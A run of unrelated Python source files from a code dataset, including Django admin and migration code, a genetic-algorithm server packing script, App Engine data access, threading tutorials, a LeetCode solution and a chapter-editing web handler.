form.base_fields['amount'].label = 'Сумма заказа'\n        form.base_fields['name'].label = 'Имя клиента'\n        form.base_fields['phone'].label = 'Телефон клиента'\n        form.base_fields['delivery'].label = 'Способ доставки'\n        form.base_fields['address'].label = 'Адрес доставки'\n        form.base_fields['payment'].label = 'Способ оплаты'\n        form.base_fields['bonus_gained'].label = 'Клиент получит бонусов с заказа'\n        form.base_fields['bonus_used'].label = 'Оплачено бонусами'\n        form.base_fields['coupon'].label = 'Промокод'\n        form.base_fields['status'].label = 'Статус заказа'\n        form.base_fields['delivery_discount_use'].label = 'Использовать скидку на доставку'\n        form.base_fields['user_append_bonus'].label = 'Начислить бонусы клиенту (по завершению заказа)'\n        return form\n\n    def response_change(self, request, obj):\n        if \"_count_amount\" in request.POST:\n            # obj.save()\n            obj.amount = obj.calc_amount()\n            if obj.user:\n                if obj.user_append_bonus:\n                    obj.bonus_gained = 
calc_bonus_gained(obj.user, obj.amount)\n else:\n obj.bonus_gained = 0 \n else:\n obj.bonus_gained = 0\n obj.save()\n # matching_names_except_this = self.get_queryset(request).filter(name=obj.name).exclude(pk=obj.id)\n # matching_names_except_this.delete()\n # obj.is_unique = True\n # obj.save()\n self.message_user(request, \"Заказ сохранен и посчитан\")\n return HttpResponseRedirect(\".\")\n return super().response_change(request, obj)\n \n\n\nadmin.site.register(Order, OrderAdmin)\n# admin.site.register(ViewedProduct)\n# admin.site.register(Promocode)\n# admin.site.register(Cart)\nadmin.site.register(Coupon)\n# admin.site.register(Item)\n\n\n","sub_path":"cart/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"378521221","text":"import time\r\nimport random\r\nimport copy\r\ndef genetic_alg_boxing(prediction, server_limitation, flavor_specification, population_scale, start_time, duration_time, elite_scale):\r\n\r\n def v0_a_v1_inplace(v0, v1):\r\n #v0 as inplace\r\n for index in range(len(v0)):\r\n v0[index] = v0[index] + v1[index]\r\n \r\n def explane_prediction(prediction):\r\n encode_prediction = []\r\n for key, value in prediction.items():\r\n for i in range(value):\r\n encode_prediction.append(key)#because index0 represent flavor1\r\n return encode_prediction\r\n \r\n def summation_f(prediction, flavor_specification):\r\n result = [0] * len(flavor_specification[1])\r\n for pre in prediction:\r\n v0_a_v1_inplace(result, flavor_specification[pre])\r\n return result\r\n \r\n def initial_population(encode_prediction, population_scale):\r\n initial_population = []\r\n for i in range(population_scale):\r\n random.shuffle(encode_prediction)\r\n initial_population.append(copy.copy(encode_prediction)) \r\n return initial_population\r\n\r\n def evaluation_function(summations, servers, server_limitation):\r\n server_summation = summation_f(servers, server_limitation)\r\n# print(\"summations:\", summations)\r\n# print(\"server_summation:\", server_summation)\r\n result = 0\r\n for index, summation in enumerate(summations):\r\n result += 10000 * summation / server_summation[index] \r\n# print(\"result:\", result)\r\n return result\r\n \r\n \r\n def evaluate_individual(population, server_limitation, flavor_specification, summation):\r\n\r\n evaluation = []\r\n for individual in population:\r\n# print(allocate_server(individual, server_limitation, flavor_specification))\r\n# print(evaluation_function(individual, allocate_server(individual, server_limitation, flavor_specification), flavor_specification, server_limitation, optimization_target))\r\n evaluation.append(\r\n (evaluation_function(summation, allocate_server(individual, server_limitation, flavor_specification)[1], server_limitation)\r\n , individual))\r\n return evaluation \r\n \r\n \r\n def allocate_server(individual, server_limitations, flavor_specifications):\r\n def v0_a_v1_inplace(v0, v1):\r\n #v0 as inplace\r\n for index in range(len(v0)):\r\n v0[index] = v0[index] + v1[index]\r\n \r\n def v0_m_v1_inplace(v0, v1):\r\n # print(\"v0:\", v0)\r\n # print(\"v1:\", v1)\r\n for index in range(len(v0)):\r\n v0[index] = v0[index] - v1[index]\r\n \r\n \r\n def sum_check_result(results):\r\n return sum(results)\r\n \r\n def check_limitation(checked_limitation, target_limitation):\r\n for index in range(len(checked_limitation)):\r\n if checked_limitation[index] > target_limitation[index]:\r\n # print(\"which dimension 
boom:\", index)\r\n return True\r\n return False\r\n \r\n def check_limitations(checked_limitations, target_limitations):\r\n check_results = []\r\n for index, checked_limitation in enumerate(checked_limitations):\r\n # print(\"checked_limitations:\", checked_limitation)\r\n # print(\"target_limitations:\", target_limitations[index])\r\n check_results.append(check_limitation(checked_limitation, target_limitations[index]))\r\n return check_results \r\n \r\n def add_flavor_limitation_and_end_point(checked_results, limitations, flavor_limitation, end_points, end_point):\r\n # print(\"limitations:\", limitations)\r\n # print(\"end_points:\", end_points)\r\n for index, result in enumerate(checked_results):\r\n if (result == False):\r\n v0_a_v1_inplace(limitations[index], flavor_limitation)\r\n end_points[index] = end_point \r\n \r\n def evaluate_single(summation, server_limitation):\r\n result = 0\r\n for index in range(len(summation)):\r\n result += (summation[index] * 100) / server_limitation[index]\r\n # print(\"result:\", result)\r\n return result\r\n \r\n def evaluate_all(summations, server_limitations, end_points, flavor_specifications, individual):\r\n # print(\"summations:\", summations)\r\n # print(\"server_limitations:\", server_limitations)\r\n # print(\"end_points:\", end_points)\r\n # print(\"flavor_specifications:\", flavor_specifications)\r\n results = []\r\n for index in range(len(summations)):\r\n v0_m_v1_inplace(summations[index], flavor_specifications[individual[end_points[index]]])\r\n results.append(evaluate_single(summations[index], server_limitations[index]))\r\n # print(\"after minus:\", summations)\r\n # print(\"results:\", results)\r\n return results.index(max(results)), end_points[results.index(max(results))]\r\n \r\n def evaluate_last(summations, server_limitations, flavor_specifications, checked_results):\r\n results = []\r\n for index, check in enumerate(checked_results):\r\n if check == True:\r\n results.append(0)\r\n else:\r\n results.append(evaluate_single(summations[index], server_limitations[index]))\r\n return results.index(max(results))\r\n \r\n limitation_temp = [[0] * len(server_limitations[0]) for i in range(len(server_limitations))]\r\n index_point_temp = [0] * len(server_limitations)\r\n checked_results = [False] * len(server_limitations)\r\n allo_result = []\r\n server_result = []\r\n start_point = 0\r\n last_point = len(individual) \r\n index = start_point\r\n while(True):\r\n \r\n while(sum_check_result(checked_results) != len(checked_results)):\r\n # print(\"########################################################################\")\r\n # print(\"individual:\", individual[index:])\r\n # print(\"checked_results:\", checked_results)\r\n flavor_limitation = flavor_specifications[individual[index]]\r\n add_flavor_limitation_and_end_point(checked_results, limitation_temp, flavor_limitation, index_point_temp, index)\r\n # print(\"after add, limitation_temp:\", limitation_temp)\r\n # print(\"after add:\", index_point_temp)\r\n checked_results = check_limitations(limitation_temp, server_limitations)\r\n # print(\"checked_results:\", checked_results)\r\n # print(\"allo_result:\", allo_result)\r\n # print(\"server_result:\", server_result)\r\n # input()\r\n index += 1\r\n # print(\"after individual:\", individual[index:])\r\n if(index == last_point):\r\n break\r\n if(sum_check_result(checked_results) == len(checked_results)):\r\n # print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\r\n server_choosed, end_point = 
evaluate_all(limitation_temp, server_limitations, index_point_temp, flavor_specifications, individual)\r\n # print(\"server_choosed:\", server_choosed)\r\n # print(\"end_point:\", end_point)\r\n # input()\r\n allo_result.append(individual[start_point:end_point])\r\n server_result.append(server_choosed)\r\n limitation_temp = [[lim for lim in flavor_specifications[individual[end_point]]] for i in range(len(server_limitations))]\r\n index_point_temp = [end_point] * len(server_limitations)\r\n start_point = end_point\r\n index = end_point + 1\r\n # print(\"start_point:\", start_point)\r\n # print(\"index:\", index)\r\n checked_results = check_limitations(limitation_temp, server_limitations)\r\n if(index == last_point):\r\n checked_results = check_limitations(limitation_temp, server_limitations)\r\n server_choosed = evaluate_last(limitation_temp, server_limitations, flavor_specifications, checked_results)\r\n allo_result.append(individual[start_point:])\r\n server_result.append(server_choosed)\r\n break\r\n return allo_result, server_result\r\n\r\n def Propagate_descendants(evaluation, elite_scale):\r\n def mutate(individual):\r\n \r\n individual = copy.copy(individual)\r\n individual_size = len(individual)\r\n mutation_point = random.randint(0, individual_size-1) # minus one because endpoint included\r\n left_len = mutation_point\r\n right_len = individual_size - 1 - mutation_point\r\n # candidate_len = left_len if left_len <= right_len else right_len\r\n # print(\"mutation_point:\", mutation_point)\r\n direction = \"left\" if left_len < right_len else \"right\" if left_len > right_len else \"center\"\r\n # print(\"direction:\", direction)\r\n # print(\"left_len:\", left_len)\r\n # print(\"right_len:\", right_len)\r\n if direction == \"left\":\r\n \r\n exchange_len = random.randint(1, left_len+1)\r\n # print(\"exchange_len:\", exchange_len)\r\n left_end_point = mutation_point + 1\r\n left_start_point = left_end_point-exchange_len\r\n \r\n left_slice = slice(left_start_point, left_end_point)\r\n \r\n right_start_point = random.randint(mutation_point+1, individual_size-exchange_len)\r\n right_end_point = right_start_point+exchange_len\r\n right_slice = slice(right_start_point, right_end_point)\r\n # right_slice = slice()\r\n elif direction == \"right\":\r\n exchange_len = random.randint(1, right_len+1)\r\n # print(\"exchange_len:\", exchange_len) \r\n right_start_point = mutation_point\r\n right_end_point = mutation_point + exchange_len\r\n right_slice = slice(right_start_point, right_end_point)\r\n \r\n left_end_point = random.randint(exchange_len, mutation_point)\r\n left_start_point = left_end_point - exchange_len\r\n left_slice = slice(left_start_point, left_end_point)\r\n elif direction == \"center\":\r\n return individual\r\n \r\n # print(\"left_slice:\", left_slice)\r\n # print(\"right_slice:\", right_slice)\r\n temp = individual[left_slice]\r\n individual[left_slice] = individual[right_slice]\r\n # print(\"individual:\", individual)\r\n individual[right_slice] = temp\r\n # print(\"individual:\", individual)\r\n return individual\r\n \r\n \r\n origin_scale = len(evaluation)\r\n del(evaluation[elite_scale:])\r\n# print(\"len(evaluation):\", len(evaluation))\r\n# elite_group = evaluation[0:elite_scale]\r\n mutated_group = []\r\n for i in range(elite_scale, origin_scale):\r\n individual = random.sample(evaluation, 1)[0][1]\r\n# mutated_individual = mutate(individual)\r\n# elite_group.append(evaluate_individual())\r\n mutated_group.append(mutate(individual))\r\n# print(\"mutated_group:\", 
mutated_group)\r\n# evaluate_individual(mutated_group, )\r\n return mutated_group \r\n \r\n def single_server_summation(single_server, flavor_specification):\r\n summation = [0] * len(flavor_specification[1])\r\n for v in single_server:\r\n summation[0] += flavor_specification[v][0]\r\n summation[1] += flavor_specification[v][1]\r\n return summation \r\n \r\n \r\n encode_prediction = explane_prediction(prediction)\r\n summation = summation_f(encode_prediction, flavor_specification)\r\n population = initial_population(encode_prediction, population_scale)\r\n evaluation = evaluate_individual(population, server_limitation, flavor_specification, summation)\r\n evaluation.sort(reverse = True)\r\n while(time.perf_counter()-start_time < duration_time):\r\n descendants = Propagate_descendants(evaluation, elite_scale)\r\n evaluation.extend(evaluate_individual(descendants, server_limitation, flavor_specification, summation))\r\n evaluation.sort(reverse = True)\r\n print(\"the best individual you get:\")\r\n print(evaluation[0][0]/float(200), len(allocate_server(evaluation[0][1], server_limitation, flavor_specification)[1]))\r\n print(\"################## finally result ########################\")\r\n allo_result, server_result = allocate_server(evaluation[0][1], server_limitation, flavor_specification)\r\n print(\"one server with virtual machine summation of virtual machine server specification\")\r\n for index, allo in enumerate(allo_result):\r\n print(allo, single_server_summation(allo, flavor_specification), server_limitation[server_result[index]])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef test():\r\n flavor_specification = {1:[1, 1024], 2:[1, 2048], 3:[1, 4096], 4:[2, 2048], 5:[2, 4096], 6:[2, 8192],\r\n 7:[4, 4096], 8:[4, 8192], 9:[4, 16384], 10:[8, 8192], 11:[8, 16384],\r\n 12:[8, 32768], 13:[16, 16384], 14:[16, 32768], 15:[16, 65536], 16:[32, 32768], 17:[32, 65536], 18:[32, 131072]}\r\n server_limitation=[[56,131072], [84, 262144], [112, 196608]]\r\n prediction = {1:0,2:0,3:0,4:9,5:38,6:114,7:238,8:35,9:0,10:188,11:0,12:0,13:0,14:0,15:0,16:0,17:0,18:0}\r\n start_time = time.perf_counter()\r\n duration_time = 50\r\n population_scale = 100\r\n res=genetic_alg_boxing(prediction, server_limitation, flavor_specification, population_scale, start_time, duration_time, elite_scale=population_scale//5)\r\n \r\nif __name__ == '__main__':\r\n test()","sub_path":"ecs/new_deploy_all_flavor.py","file_name":"new_deploy_all_flavor.py","file_ext":"py","file_size_in_byte":14187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"157859762","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0002_auto_20150812_1230'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='author',\n field=models.ForeignKey(null=True, to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='post',\n name='created_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 8, 12, 14, 11, 3, 223906, tzinfo=utc)),\n ),\n ]\n","sub_path":"djangogirls_tutorial/blog/migrations/0003_auto_20150812_1511.py","file_name":"0003_auto_20150812_1511.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"627528683","text":"'''\nCreated on 
22-Apr-2014\n\n@author: tousif\n'''\nfrom collections import defaultdict\nfrom datetime import datetime\nimport json\nimport logging\n\nfrom com.dub.objects.Audio import Audio\nfrom com.dub.objects.Video import Video\nfrom google.appengine.ext import ndb\n\n\nclass BrandReportDataAccess:\n \n parentPFList = \"\"\n \n def __init__(self):\n# self.connection=ConnectionManager().get_connection()\n return \n \n \n def tree(self):\n return defaultdict(self.tree)\n\n def VideoLink(self, videoLink):\n \"\"\"Constructs a Datastore key for a Video entity from the given video link.\"\"\"\n return ndb.Key('Video', videoLink)\n \n def AudioLink(self, audioKeys):\n \"\"\"Constructs a Datastore key for an Audio entity from the given audio key.\"\"\"\n return ndb.Key('Audio', audioKeys) \n \n def AddNewVideo(self, name, videoLink, videocat):\n \n# v = self.VideoLink(videoLink)\n \n vidquery = Video.query(ancestor=self.VideoLink(videoLink))\n \n videos = vidquery.get()\n if(videos != None):\n logging.info(str(videos.videolink))\n \n if(str(videos.videolink) == videoLink):\n post = dict()\n post[\"error\"] = \"Already Exists\"\n return json.dumps(post)\n else:\n vid = Video(parent=self.VideoLink(videoLink))\n # name=\"sample\",videolink=videoLink,audiolink=\"\",videoCategory=\"Entertainment\"\n vid.name = name\n vid.videolink = videoLink\n vid.audiolink = \"\"\n vid.videoCategory = videocat\n vid.dubsCount = 0\n vid.addedDate = datetime.now()\n vid.put()\n post = dict()\n post[\"result\"] = \"Added new video\"\n return json.dumps(post)\n \n \n def GetVideoLinks(self, category, sortBy):\n logging.info(category)\n if(sortBy == \"time\"):\n if(category == \"all\"):\n vidquery = Video.query().order(-Video.addedDate)\n else:\n vidquery = Video.query(Video.videoCategory == str(category)).order(-Video.addedDate)\n elif(sortBy == \"dubscount\"):\n if(category == \"all\"):\n vidquery = Video.query().order(-Video.dubsCount)\n else:\n vidquery = Video.query(Video.videoCategory == str(category)).order(-Video.dubsCount)\n videos = vidquery.fetch(100)\n# logging.info(str(videos))\n \n \n Videos = []\n \n for video in videos:\n vidobj = dict()\n vidobj[\"videoname\"] = str(video.name)\n vidobj[\"videolink\"] = str(video.videolink)\n vidobj[\"videocat\"] = str(video.videoCategory)\n vidobj[\"dubscount\"] = str(video.dubsCount)\n vidobj[\"addeddate\"] = str(video.addedDate)\n Videos.append(vidobj)\n \n \n return json.dumps(Videos)\n \n \n def GetAudioByLink(self, videoLink):\n audquery = Audio.query(ancestor=self.AudioLink(videoLink)).order(-Audio.viewCount)\n audios = audquery.fetch(100)\n Audios = []\n for audio in audios:\n aud = dict()\n aud[\"audname\"] = audio.name\n aud[\"audkey\"] = str(audio.audiolink)\n aud[\"composer\"] = audio.composer\n aud[\"starttime\"] = str(audio.starttime)\n aud[\"viewcount\"] = str(audio.viewCount)\n aud[\"language\"] = str(audio.language)\n# aud[\"audname\"]=audio.name\n \n logging.info(audio.audiolink)\n Audios.append(aud)\n return json.dumps(Audios) \n \n \n def AddNewAudio(self, blobkeys, audioname, videoLink, composer, composeremail, starttime, language):\n \n# logging.info(str(blob))\n \n \n vid = Video.query(Video.videolink == videoLink)\n v = vid.get()\n v.dubsCount = int(v.dubsCount) + 1\n v.put()\n \n \n audioKeys = blobkeys\n aud = Audio(parent=self.AudioLink(videoLink))\n aud.audiolink = audioKeys[0]\n aud.videolink = videoLink\n aud.name = audioname\n aud.audioblobkey = audioKeys\n aud.upvotes = 0\n aud.downvotes = 0\n aud.composer = composer\n aud.composerEmail = composeremail\n 
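# record the upload timestamp and start the view counter at zero before saving the new Audio entity\n 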
aud.recordeddate = datetime.now()\n aud.starttime = starttime\n aud.language = language \n aud.viewCount = 0\n aud.put()\n post = dict()\n post[\"result\"] = audioKeys\n return json.dumps(post)\n \n def GetAudioDetails(self, audkey):\n \n# audquery = Audio.query(ancestor=self.AudioLink(videoLink))\n q = Audio.query(Audio.audiolink == audkey)\n# q = ndb.gql(\"Select * from Audio where audioblobkey = :1\",audBlobkey)\n Audios = []\n audio = q.get()\n logging.info(audio)\n if(audio != None):\n aud = dict()\n aud[\"audname\"] = audio.name\n aud[\"audkey\"] = str(audio.audiolink)\n aud[\"composer\"] = audio.composer\n aud[\"starttime\"] = str(audio.starttime)\n aud[\"viewcount\"] = str(audio.viewCount)\n aud[\"language\"] = str(audio.language)\n # aud[\"audname\"]=audio.name\n \n Audios.append(aud)\n else:\n aud = dict()\n aud[\"error\"] = \"URL contains an invalid audio key\"\n Audios.append(aud)\n return json.dumps(Audios)\n \n\n \n def IncreaseViewCount(self, audiokey, viewcount):\n q = Audio.query(Audio.audiolink == audiokey)\n aud = q.get()\n aud.viewCount = int(viewcount)\n aud.put()\n post = dict()\n post[\"result\"] = \"View count increased by 1\"\n return json.dumps(post)\n \n def GetVideoDetails(self, videoUrl):\n vid = Video.query(Video.videolink == videoUrl)\n video = vid.get()\n vidobj = dict()\n vidobj[\"videoname\"] = str(video.name)\n vidobj[\"videolink\"] = str(video.videolink)\n vidobj[\"videocat\"] = str(video.videoCategory)\n vidobj[\"dubscount\"] = str(video.dubsCount)\n vidobj[\"addeddate\"] = str(video.addedDate)\n return json.dumps(vidobj)\n \n def getVideoSearch(self, searchterm):\n vidquery = Video.query(ndb.AND(Video.name >= searchterm, Video.name <= searchterm + u'\\ufffd'))\n videos = vidquery.fetch(100)\n# logging.info(str(videos))\n \n \n Videos = []\n \n for video in videos:\n vidobj = dict()\n vidobj[\"videoname\"] = str(video.name)\n vidobj[\"videolink\"] = str(video.videolink)\n vidobj[\"videocat\"] = str(video.videoCategory)\n vidobj[\"dubscount\"] = str(video.dubsCount)\n vidobj[\"addeddate\"] = str(video.addedDate)\n Videos.append(vidobj)\n \n \n return json.dumps(Videos)\n \n \n \n \n","sub_path":"src/com/dub/database/BrandReportDataAccess.py","file_name":"BrandReportDataAccess.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"481306301","text":"#!/kroot/rel/default/bin/kpython\n\nimport ktl\nimport time\nimport sys\n\ntimestr = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\nverbose = False\npthresh = 1.e-6 # Pressure threshold\n\nif len(sys.argv) > 1:\n for par in sys.argv[1:]:\n if 'v' in par:\n verbose = True\n else:\n try:\n tt = float(par)\n pthresh = tt\n except ValueError:\n print(\"parameter? 
- %s\" % par)\n\ntry:\n ktl_pressure = ktl.cache('krvs', 'pressure')\nexcept:\n if verbose:\n print(timestr + ': KRVS server not running!')\n sys.exit(0)\n\npressure = float(ktl_pressure.read())\n# Pressure exceeds threshold\nif pressure > pthresh:\n print(timestr + \": Pressure exceeds %.3e: %.3e\" % (pthresh, pressure))\nelse:\n if verbose:\n print(timestr + \": Pressure is %.3e\" % pressure)\n print(timestr + \": Threshold pressure is %.3e\" % pthresh)\n","sub_path":"kcwi/check_pressure.py","file_name":"check_pressure.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"185592220","text":"from multiprocessing import Process\nfrom os import getpid\nfrom threading import Thread, Lock\nfrom random import randint\nfrom time import time, sleep\n\ndef download_task(filename):\n # print('start process, number [%d]' % getpid())\n print('start downloading %s ' %filename)\n time_to_download = randint(5, 10)\n sleep(time_to_download)\n print('%s download finished, takes %d seconds' %(filename, time_to_download))\n\n\ndef main_process():\n start = time()\n p1 = Process(target=download_task, args=('Python.pdf', ))\n p1.start()\n p2 = Process(target=download_task, args=('Peking.avi', ))\n p2.start()\n p1.join()\n p2.join()\n end = time()\n print('total takes %.2f seconds.' %(end-start))\n\n\nclass DownloadTask(Thread):\n\n def __init__(self, filename):\n super().__init__()\n self._filename = filename\n\n def run(self):\n print('start downloading %s ' %self._filename)\n time_to_download = randint(5, 10)\n sleep(time_to_download)\n print('%s download finished, takes %d seconds' %(self._filename, time_to_download))\n\n\ndef main_Thread():\n start = time()\n #p1 = Thread(target=download_task, args=('Python.pdf', ))\n p1 = DownloadTask('python.pdf')\n p1.start()\n #p2 = Thread(target=download_task, args=('Peking.avi', ))\n p2 = DownloadTask('Peking.avi')\n p2.start()\n p1.join()\n p2.join()\n end = time()\n print('total takes %.2f seconds.' 
%(end-start))\n\n\n# saving money\nclass Account(object):\n\n def __init__(self):\n self._balance = 0\n self._lock = Lock()\n\n def deposit(self, money):\n self._lock.acquire()\n try:\n new_balance = self._balance + money\n sleep(0.01)\n self._balance = new_balance\n finally:\n self._lock.release()\n\n @property\n def balance(self):\n return self._balance\n\nclass AddMoneyThread(Thread):\n\n def __init__(self, account, money):\n super().__init__()\n self._account = account\n self._money = money\n\n def run(self):\n self._account.deposit(self._money)\n\ndef main_deposit():\n account = Account()\n threads =[]\n for _ in range(100):\n t = AddMoneyThread(account, 1)\n threads.append(t)\n t.start()\n\n for t in threads:\n t.join()\n print('account money: %d' %account.balance)\n\n\n# Study Case 1 : Threaded GUI download procedure\nimport time\nimport tkinter\nimport tkinter.messagebox\n\ndef download():\n time.sleep(10)\n tkinter.messagebox.showinfo('Tips', 'Finish downloading.')\n\ndef show_about():\n tkinter.messagebox.showinfo('About', 'Author: ryan')\n\ndef main_coroutine():\n \n class DownloadTaskHandler(Thread):\n\n def run(self):\n time.sleep(10)\n tkinter.messagebox.showinfo('tips', 'Finish download!')\n btn1.config(state=tkinter.NORMAL)\n\n def download():\n btn1.config(state=tkinter.DISABLED)\n DownloadTaskHandler(daemon=True).start()\n\n\n top = tkinter.Tk()\n top.title('Single Thread')\n top.geometry('200x150')\n top.wm_attributes('-topmost', True)\n\n panel = tkinter.Frame(top)\n btn1 = tkinter.Button(panel, text='Download', command=download)\n btn1.pack(side='left')\n\n btn2 = tkinter.Button(panel, text='About', command=show_about)\n btn2.pack(side='right')\n panel.pack(side='bottom')\n\n tkinter.mainloop()\n\n\n# Study Case 2 : Divide and Conquer\nfrom time import time\nfrom multiprocessing import Process, Queue\n\ndef task_handler(curr_list, result_queue):\n total = 0\n for number in curr_list:\n total += number\n result_queue.put(total)\n\n\ndef main():\n processes = []\n number_list = [x for x in range(1, 100000001)]\n result_queue = Queue()\n index = 0\n for _ in range(8):\n p = Process(target=task_handler, \n args=(number_list[index:index+12500000], result_queue))\n index += 12500000\n processes.append(p)\n p.start()\n\n start = time()\n for p in processes:\n p.join()\n total = 0\n while not result_queue.empty():\n total += result_queue.get()\n print(total)\n end = time()\n print('Execution time: %.3fs' %(end-start))\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"013.py","file_name":"013.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"585563829","text":"# Given an array with n objects colored red, white or blue, sort them in-place so that objects of the same color are adjacent, with the colors in the order red, white and blue.\n\n# Here, we will use the integers 0, 1, and 2 to represent the color red, white, and blue respectively.\n\n# Note: You are not supposed to use the library's sort function for this problem.\n\n# Example:\n\n# Input: [2,0,2,1,1,0]\n# Output: [0,0,1,1,2,2]\n\nclass Solution:\n def sortColors(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n n = len(nums)\n p0, p1, p2 = 0, 0, n-1\n while p1 <= p2:\n if nums[p1] == 1:\n p1 += 1\n elif nums[p1] == 0:\n nums[p0], nums[p1] = nums[p1], nums[p0]\n p0 += 1\n p1 += 1\n elif nums[p1] == 2:\n nums[p2], nums[p1] = nums[p1], 
nums[p2]\n p2 -= 1\n \n# Time: O(nlog(n))\n# Space: O(1)\n# Difficulty: medium","sub_path":"two pointers/python/leetcode75_Sort_Colors.py","file_name":"leetcode75_Sort_Colors.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"252026668","text":"#import logging\nimport json\n\nfrom base_handler import BaseHandler\nfrom chapter import *\nfrom myuser import get_user\nfrom mytemplate import write_template\nfrom question import list_questions, Question\nfrom mymarkdown import mymarkdown,update_links\n\n\"\"\"\nChapters are a way of organising questions. A chapter may either include other\nchapters or questions.\n\"\"\"\n\ndef set_chapter_text(chapter, text, save=False):\n \"\"\"Parse the new text and correct if needed.\n \n Consider input text to have Markdown format.\n - Image names in reference links need to have urls.\n \"\"\"\n chapter.text = update_links(chapter, text)\n chapter.refresh = False\n if save:\n chapter.put()\n\n\ndef set_question_text(chapter, question, text, save=False):\n \"\"\"Parse the new text and correct if needed.\n \n Consider input text to have Markdown format.\n - Image names in reference links need to have urls.\n \"\"\"\n question.text = update_links(chapter, text)\n question.refresh = False\n if save:\n question.put()\n \ndef refresh_chapter(chapter):\n chapter.refresh = True\n chapter.put()\n query = Question.all().filter('chapter =', chapter)\n for q in query.run():\n q.refresh = True\n q.put\n query = Chapter.all().ancestor(chapter.key())\n for c in query.run():\n if c != chapter:\n refresh_chapter(c)\n\n\n###########################################################################\n# Request handlers\n###########################################################################\n \nclass ChapterPage(BaseHandler):\n def get(self):\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n encoded_chapter_key = self.request.get('chapter')\n \n chapter, encoded_chapter_key = get_chapter_by_encoded_key(encoded_chapter_key)\n subchapters = list_edit_chapters(user, chapter)\n subchapters_empty = len(subchapters) == 0\n parents = list_parents(chapter)\n parents.reverse()\n \n if chapter.text != None:\n if chapter.refresh:\n text = chapter.text\n set_chapter_text(chapter, text, True)\n chapter_formatted_text = mymarkdown(chapter.text)\n else:\n chapter_formatted_text = ''\n \n questions = list_questions(chapter)\n for q in questions:\n if q.refresh:\n text = q.text\n set_question_text(chapter, q, text, True)\n q.formatted_text = mymarkdown(q.text)\n \n has_questions = len(questions) > 0\n \n template_values = {\n 'subchapters': subchapters,\n 'subchapters_empty': subchapters_empty,\n 'parents' : parents,\n 'chapter_formatted_text' : chapter_formatted_text,\n 'questions' : questions,\n 'has_questions' : has_questions,\n }\n \n add_chapter_values(template_values, chapter)\n \n write_template(self, user, 'chapter.html',template_values)\n \nclass EditChapterPage(BaseHandler):\n def get(self):\n\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n encoded_chapter_key = self.request.get('chapter')\n chapter, encoded_chapter_key = get_chapter_by_encoded_key(encoded_chapter_key)\n\n questions = list_questions(chapter)\n for q in questions:\n if q.refresh:\n text = q.text\n set_question_text(chapter, q, text, True)\n q.formatted_text = mymarkdown(q.text)\n \n has_questions = len(questions) > 0\n has_text = chapter.text and 
len(chapter.text) > 0\n template_values = {\n 'questions' : questions,\n 'has_questions' : has_questions,\n 'has_text': has_text,\n }\n add_chapter_values(template_values, chapter)\n template_values['title'] = 'Edit chapter ' + chapter.title\n \n write_template(self, user, 'chapter_edit.html',template_values)\n \n###########################################################################\n# Chapters\n###########################################################################\nclass Chapters(BaseHandler):\n \"\"\"Implements REST service for managing chapters\"\"\"\n def put(self,Id):\n \"\"\"Save a chapter with key == Id\"\"\"\n #raise Exception(self.request.arguments())\n chapter,ekey = get_chapter_by_encoded_key(Id)\n if chapter:\n jsn = json.decoder.JSONDecoder()\n model = jsn.decode( self.request.get('model'))\n #raise Exception(model[0])\n if not 'parent_key' in model:\n self.response.out.write('error')\n return\n chapter.title = model['title']\n if 'text' in model:\n set_chapter_text(chapter, model['text'])\n chapter.put()\n else:\n raise Exception('Saving of chapter failed')\n\n def post(self,Id=None):\n \"\"\"Create new chapter instance and return its id, which is its key\"\"\"\n user = self.get_current_user()\n if not user:\n self.redirect('/')\n return\n \n #raise Exception(self.request.get('_method'))\n httpMethod = self.request.get('_method')\n if httpMethod == 'PUT':\n self.put(Id)\n return\n if httpMethod == 'DELETE':\n self.delete(Id)\n return\n if httpMethod == 'GET':\n raise Exception('GET not implemented')\n return\n \n jsn = json.decoder.JSONDecoder()\n model = jsn.decode( self.request.get('model'))\n #raise Exception(model[0])\n if not 'parent_key' in model:\n self.response.out.write('error')\n if not 'title' in model:\n self.response.out.write('error')\n \n root = root_key()\n encoded_parent_key = model['parent_key']\n if encoded_parent_key == 'root':\n parent_key = root\n else:\n parent_key = db.Key(encoded=encoded_parent_key)\n \n title = model['title']\n \n if len(title) > 0:\n# chapter = Chapter(parent=parent_key)\n# chapter.authors.append(user.key())\n# chapter.title = title\n# chapter.put()\n chapter = create_chapter(parent_key, user, title)\n else:\n self.response.out.write('error')\n return\n \n self.response.out.write('{\"id\":\"'+str(chapter.key())+'\"}')\n\n def delete(self, Id):\n \"\"\"Delete a chapter with key == Id\"\"\"\n chapter,ekey = get_chapter_by_encoded_key(Id)\n if chapter:\n chapter.deleteAll()\n else:\n raise Exception('Deleting of chapter 